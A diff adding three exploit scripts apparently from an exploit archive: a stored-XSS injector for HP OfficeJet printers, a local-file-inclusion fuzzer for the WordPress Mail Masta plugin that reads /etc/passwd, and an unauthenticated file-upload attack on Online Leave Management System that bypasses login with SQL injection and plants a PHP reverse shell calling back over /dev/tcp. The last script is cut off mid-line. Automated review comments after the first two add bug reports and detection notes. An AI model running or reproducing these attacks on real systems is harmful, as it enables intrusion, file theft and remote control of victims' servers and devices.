diff --git a/exploits/hardware/webapps/50227.py b/exploits/hardware/webapps/50227.py
new file mode 100755
index 000000000..c19a50aa5
--- /dev/null
+++ b/exploits/hardware/webapps/50227.py
@@ -0,0 +1,58 @@
+# Exploit Title: HP OfficeJet 4630/7110 MYM1FN2025AR 2117A – Stored Cross-Site Scripting (XSS)
+# Date: 01/08/2021
+# Exploit Author: Tyler Butler
+# Vendor Homepage: https://www8.hp.com/
+# Vendor Bulletin: https://support.hp.com/ie-en/document/ish_4433829-4433857-16/hpsbpi03742
+# Researcher Bulletin: https://tbutler.org/2021/04/29/hp-officejet-4630
+# Version: HP OfficeJet 7110 Wide Format ePrinter
+# Tested on: HP Officejet 4630 e-All-in-One Printer series model number B4L03A
+
+# PoC:
+import requests
+import json
+from requests.exceptions import HTTPError
+
+target = 'http://192.168.223.1' # The IP of the vulnerable taget
+payload = '''''' # The XSS injection payload you want to use
+path='/DevMgmt/ProductConfigDyn.xml' # Path location of the PUT command
+pre = '''
+
+
+
+
+
+
+''' # The start of the request body
+post = '''
+
+
+
+
+''' # The end of the request body
+body = pre + payload + post
+
+
+headers = {
+ 'Host':'192.168.223.1',
+ 'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0',
+ 'Accept':'*/*',
+ 'Accept-Language':'en-US,en;q=0.5',
+ 'Accept-Encoding':'gzip, deflate',
+ 'Content-Type':'text/xml',
+ 'Content-Length':str(len(body.encode('utf-8'))),
+ 'Origin':'https://192.168.223.1',
+ 'Connection':'close',
+ 'Referer':target,
+ }
+
+print('{!} Starting HP Officejet 4630 XSS Injector .... \n Author: Tyler Butler\n @tbutler0x90')
+try:
+ print('{!} Injecting payload :',payload)
+ response = requests.put(target+path, headers = headers, data = body)
+ response.raise_for_status()
+except HTTPError as http_err:
+ print('{X}',f'HTTP error occurred: {http_err}')
+except Exception as err:
+ print('{X}',f'Other error occurred: {err}')
+else:
+ print('{!} Success!')
\ No newline at end of file
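Review bot: The `requests.put(target+path, headers = headers, data = body)` call has no timeout, so the script hangs indefinitely if the printer's embedded web server stalls; `requests.put(target+path, headers=headers, data=body, timeout=10)` bounds it. The `else:` branch prints `{!} Success!` on any 2xx status, which shows only that the device accepted the PUT, not that the value was stored, so the output should not be read as proof of exposure or of a fix when re-testing after applying the firmware from the vendor bulletin. The request carries no credentials or session cookie, so what a defender would see on the network is, as far as this file shows, an unauthenticated PUT to `/DevMgmt/ProductConfigDyn.xml`. A header comment such as `# Detection: unauthenticated PUT to /DevMgmt/ProductConfigDyn.xml; remediation: firmware update per the vendor bulletin above` would record that for the people patching.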
diff --git a/exploits/php/webapps/50226.py b/exploits/php/webapps/50226.py
new file mode 100755
index 000000000..a1fc13497
--- /dev/null
+++ b/exploits/php/webapps/50226.py
@@ -0,0 +1,77 @@
+# Exploit Title: WordPress Plugin Mail Masta 1.0 - Local File Inclusion (2)
+# Date: 2021-08-24
+# Exploit Author: Matheus Alexandre [Xcatolin]
+# Software Link: https://downloads.wordpress.org/plugin/mail-masta.zip
+# Version: 1.0
+
+WordPress Plugin Mail Masta is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input.
+
+* Make sure to modify the wordlist path to your preferred wordlist. You can also download the one i used at Github:
+https://github.com/Xcatolin/Personal-Exploits/
+
+#!/usr/bin/python
+
+# Exploit for the Wordpress plugin mail-masta 1.0 LFI vulnerability
+
+import requests
+from requests.exceptions import ConnectionError
+
+class bcolors:
+ OKGREEN = '\033[92m'
+ WARNING = '\033[93m'
+ FAIL = '\033[91m'
+ ENDC = '\033[0m'
+ BOLD = '\033[1m'
+ ITALIC = '\33[3m'
+
+print(bcolors.BOLD + """\
+ __ __ _ _ __ __ _
+ | \/ |__ _(_) |___| \/ |__ _ __| |_ __ _
+ | |\/| / _` | | |___| |\/| / _` (_-< _/ _` |
+ |_| |_\__,_|_|_| |_| |_\__,_/__/\__\__,_|
+ _ _ ___ _ _ ___ _ _
+ | | ___ __ __ _| | | __(_) |___ |_ _|_ _ __| |_ _ __(_)___ _ _
+ | |__/ _ \/ _/ _` | | | _|| | / -_) | || ' \/ _| | || (_-< / _ \ ' \
+ |____\___/\__\__,_|_| |_| |_|_\___| |___|_||_\__|_|\_,_/__/_\___/_||_|
+
+
+ |_ . \_/ _ _ |_ _ |. _
+ |_)\/. / \(_(_||_(_)||| )
+ /
+ """ + bcolors.ENDC)
+
+endpoint = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl="
+valid = "/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd"
+
+
+print (bcolors.WARNING + "[+] Insert the target including the WordPress instance:" + bcolors.ENDC)
+print (bcolors.ITALIC + "ex: http://target.com/wordpress\n" + bcolors.ENDC)
+target = raw_input("~# ")
+
+print (bcolors.WARNING + "[*] Checking if the target is alive..." + bcolors.ENDC)
+try:
+ request = requests.get(target)
+except ConnectionError:
+ print (bcolors.FAIL + "[X] Target not available. Please check the URL you've entered." + bcolors.ENDC)
+ exit(1)
+else:
+ print (bcolors.OKGREEN + "[!] Target up and running!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Checking if the Mail-Masta endpoint is vulnerable..." + bcolors.ENDC)
+try:
+ response = requests.get(target + valid)
+except len(response.content) < 1000 :
+ print (bcolors.FAIL + "[X] Endpoint not vulnerable." + bcolors.ENDC)
+ exit(1)
+else:
+ print (bcolors.OKGREEN + "[!] Endpoint vulnerable!\n" + bcolors.ENDC)
+
+print (bcolors.WARNING + "[*] Fuzzing for files in the system..." + bcolors.ENDC)
+wordlist='wordlist.txt' ## Change here
+lines=open(wordlist, "r").readlines()
+
+for i in range(0, len(lines)):
+ word=lines[i].replace("\n","")
+ response = requests.get(target + endpoint + word)
+ if len(response.content) > 500 :
+ print (bcolors.OKGREEN + "[!] " + bcolors.ENDC) + "File",word,"found!"
\ No newline at end of file
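Review bot: The check at `except len(response.content) < 1000 :` is not a condition test, because an `except` clause is only evaluated when `requests.get` raises; the script therefore prints `[!] Endpoint vulnerable!` for every host that answers, including ones where the plugin is removed or fixed, and its verdict cannot be used to confirm remediation. The author presumably meant `if len(response.content) < 1000:` after the request, although a response-size threshold (here and in the `> 500` test in the loop) is a weak signal that a large error page or custom 404 also satisfies. The prose lines ahead of the misplaced `#!/usr/bin/python` are not commented, so the file does not parse as Python as committed. For detection, the observable is GET requests to `/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php` with a filesystem path in `pl=`, and a comment saying so, e.g. `# Detection: requests to count_of_send.php with a file path in the pl parameter`, would help anyone triaging web logs.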
diff --git a/exploits/php/webapps/50228.py b/exploits/php/webapps/50228.py
new file mode 100755
index 000000000..7511c45da
--- /dev/null
+++ b/exploits/php/webapps/50228.py
@@ -0,0 +1,81 @@
+# Exploit Title: Online Leave Management System 1.0 - Arbitrary File Upload to Shell (Unauthenticated)
+# Date: 24-08-2021
+# Exploit Author: Justin White
+# Vendor Homepage: https://www.sourcecodester.com
+# Software Link: https://www.sourcecodester.com/php/14910/online-leave-management-system-php-free-source-code.html
+# Version: V1
+# Category: Webapps
+# Tested on: Linux
+
+
+#!/bin/env python3
+import requests
+import time
+import sys
+from colorama import Fore, Style
+
+if len(sys.argv) != 4:
+ print('python3 script.py ')
+ print('Example: python3 script.py http://127.0.0.1/ 10.0.0.1 4444')
+ exit()
+
+else:
+ try:
+ url = sys.argv[1]
+ attacker_ip = sys.argv[2]
+ attacker_port = sys.argv[3]
+ print()
+ print('[*] Trying to login...')
+ time.sleep(1)
+ login = url + '/classes/Login.php?f=login'
+ payload_name = "reverse_shell.php"
+ payload_file = r"""& /dev/tcp/\"{}\"/{} 0>&1'");?>""".format(attacker_ip, attacker_port)
+ session = requests.session()
+ post_data = {"username": "'' OR 1=1-- -'", "password": "'' OR 1=1-- -'"}
+ user_login = session.post(login, data=post_data)
+ cookie = session.cookies.get_dict()
+
+ if user_login.text == '{"status":"success"}':
+ print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Successfully Signed In!')
+ upload_url = url + "/classes/Users.php?f=save"
+ cookies = cookie
+ headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------221231088029122460852571642112", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/leave_system/admin/?page=user"}
+ data = "-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"id\"\r\n\r\n1\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"firstname\"\r\n\r\nAdminstrator\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"lastname\"\r\n\r\nAdmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\nadmin\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n\r\n-----------------------------221231088029122460852571642112\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + payload_name +"\"\r\nContent-Type: application/x-php\r\n\r\n\n " + payload_file + "\n\n\r\n-----------------------------221231088029122460852571642112--\r\n"
+ print('[*] Trying to Upload Reverse Shell...')
+ time.sleep(2)
+
+ try:
+ print('[' + Fore.GREEN + '+' + Style.RESET_ALL + ']' + ' Reverse Shell Uploaded!')
+ upload = session.post(upload_url, headers=headers, cookies=cookie, data=data)
+ upload_check = f'{url}/uploads'
+ r = requests.get(upload_check)
+ if payload_name in r.text:
+
+ payloads = r.text.split('